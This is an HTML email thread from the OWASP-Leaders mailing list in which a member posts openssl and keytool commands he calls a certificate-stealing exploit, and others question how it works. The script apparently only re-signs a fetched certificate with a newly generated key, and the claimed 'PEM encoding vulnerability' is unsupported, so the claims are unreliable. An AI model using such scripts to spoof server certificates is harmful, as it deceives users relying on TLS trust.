<html>
  <head>
    <meta content="text/html; charset=windows-1252"
      http-equiv="Content-Type">
  </head>
  <body bgcolor="#FFFFFF" text="#000000">
    openssl s_client -showcerts -connect $host:$port > $keyring.pem;
    <br>
    openssl x509 -in $keyring.pem  -pubkey > $keyring.cer;<br>
    keytool -keystore $ks --importcert --alias $keyring.pem -file
    $keyring.pem -storepass $passwd -noprompt;<br>
    keytool -genkey -alias $keyring.key -keyalg RSA -keystore $ks
    -storepass $passwd -noprompt<br>
    keytool -v -importkeystore -srckeystore $ks -srcalias $keyring.key
    -destkeystore $keyring.p12 -file $keyring.p12 -deststoretype PKCS12
    -storepass $passwd -noprompt<br>
    openssl pkcs12 -in $keyring.p12 -out $keyring.key -passin
    pass:$passwd<br>
    echo "Stealing CA"<br>
    cat $keyring.key >> $keyring.pem<br>
    openssl x509 -inform pem -in $keyring.pem -out ca-$keyring.crt
    -signkey $keyring.key -CA $keyring.key -CAcreateserial <br>
    <br>
    This is how I exactly do it, they are checking for public key and
    private key, I'm not sure why openssl let's you resign as a key. But
    here is the source for the exploit. <br>
    <br>
    <div class="moz-cite-prefix">On 12/26/13, 11:35 AM, Abbas Naderi
      wrote:<br>
    </div>
    <blockquote
      cite="mid:119ECE03-9C58-48F2-8E79-040B31C1FC2F@owasp.org"
      type="cite">
      <meta http-equiv="Content-Type" content="text/html;
        charset=windows-1252">
      I didn’t quite understand. What does the encoding vulnerability
      expose? SSL certs are public-keys plus a bunch of other data.
      There is no private key inside to extract and resign another
      certificate with.
      <div>-A<br>
        <div>
          <div>On Dec 26, 2013, at 2:32 PM, Gregory Disney <<a
              moz-do-not-send="true"
              href="mailto:gregory.disney@owasp.org">gregory.disney@owasp.org</a>>
            wrote:</div>
          <br class="Apple-interchange-newline">
          <blockquote type="cite">
            <meta content="text/html; charset=windows-1252"
              http-equiv="Content-Type">
            <div bgcolor="#FFFFFF" text="#000000"> I think a fair
              description would be it simplifies spoofing certs. This
              started out as a proof of concept a year ago when I
              realized there was a vulnerability in PEM encoding of SSL
              certs, So I chain-loaded a java key store which was
              converted to key, then resigned the cert with the
              chain-loaded key, thus keeping the context of the original
              certificate with a hijacked authority. <br>
              <div class="moz-cite-prefix">On 12/26/13, 11:21 AM, Abbas
                Naderi wrote:<br>
              </div>
              <blockquote
                cite="mid:1B556592-055F-4E5F-A9CF-13354D8F2946@owasp.org"
                type="cite">
                <meta http-equiv="Content-Type" content="text/html;
                  charset=windows-1252">
                Well a description of what this does would be a good
                idea to start with…
                <div>-A<br>
                  <div style="">
                    <div>On Dec 26, 2013, at 2:18 PM, Gregory Disney
                      <<a moz-do-not-send="true"
                        href="mailto:gregory.disney@owasp.org">gregory.disney@owasp.org</a>>

                      wrote:</div>
                    <br class="Apple-interchange-newline">
                    <blockquote type="cite">
                      <meta content="text/html; charset=windows-1252"
                        http-equiv="Content-Type">
                      <div bgcolor="#FFFFFF" text="#000000"> I'm working
                        on the documentation it works via  turning a a
                        keytool pk12 to openssl key, then embedding the
                        key on the root ca and resigning with the
                        embedded key.<br>
                        <div class="moz-cite-prefix">On 12/26/13, 10:47
                          AM, Dinis Cruz wrote:<br>
                        </div>
                        <blockquote
cite="mid:CA+f=kXDpB+4WH_ypbm79BMhucdQNCx_bVAQo1U9PnQynLqyfhA@mail.gmail.com"
                          type="cite">
                          <meta http-equiv="Context-Type"
                            content="text/html; charset=ISO-8859-1">
                          <p dir="ltr">Hi Gregory, where can I find the
                            details of how this works?</p>
                          <p dir="ltr">Thx</p>
                          <p dir="ltr">Dinis</p>
                          <div class="gmail_quote">On 26 Dec 2013 07:44,
                            "Gregory Disney" <<a
                              moz-do-not-send="true"
                              href="mailto:gregory.disney@owasp.org">gregory.disney@owasp.org</a>>


                            wrote:<br type="attribution">
                            <blockquote class="gmail_quote"> Screen shot
                              of successfully spoofed certs:<br>
                              <a moz-do-not-send="true"
href="http://image-store.slidesharecdn.com/f6ff3390-6dfc-11e3-8ed6-22000a9193db-original.png"
                                target="_blank">http://image-store.slidesharecdn.com/f6ff3390-6dfc-11e3-8ed6-22000a9193db-original.png</a><br>
                              Each of these cert's have been tested and
                              capable of creating SSL sessions.<br>
                              Cert Stealer:<br>
                              <a moz-do-not-send="true"
                                href="https://gist.github.com/gdisneyleugers/8129304"
                                target="_blank">https://gist.github.com/gdisneyleugers/8129304</a><br>
                              -Greg<br>
_______________________________________________<br>
                              OWASP-Leaders mailing list<br>
                              <a moz-do-not-send="true"
                                href="mailto:OWASP-Leaders@lists.owasp.org"
                                target="_blank">OWASP-Leaders@lists.owasp.org</a><br>
                              <a moz-do-not-send="true"
                                href="https://lists.owasp.org/mailman/listinfo/owasp-leaders"
                                target="_blank">https://lists.owasp.org/mailman/listinfo/owasp-leaders</a><br>
                            </blockquote>
                          </div>
                        </blockquote>
                        <br>
                      </div>
                      _______________________________________________<br>
                      OWASP-Leaders mailing list<br>
                      <a moz-do-not-send="true"
                        href="mailto:OWASP-Leaders@lists.owasp.org">OWASP-Leaders@lists.owasp.org</a><br>
                      <a moz-do-not-send="true"
                        class="moz-txt-link-freetext"
                        href="https://lists.owasp.org/mailman/listinfo/owasp-leaders">https://lists.owasp.org/mailman/listinfo/owasp-leaders</a><br>
                    </blockquote>
                  </div>
                  <br>
                </div>
              </blockquote>
              <br>
            </div>
          </blockquote>
        </div>
        <br>
      </div>
    </blockquote>
    <br>
  </body>
</html>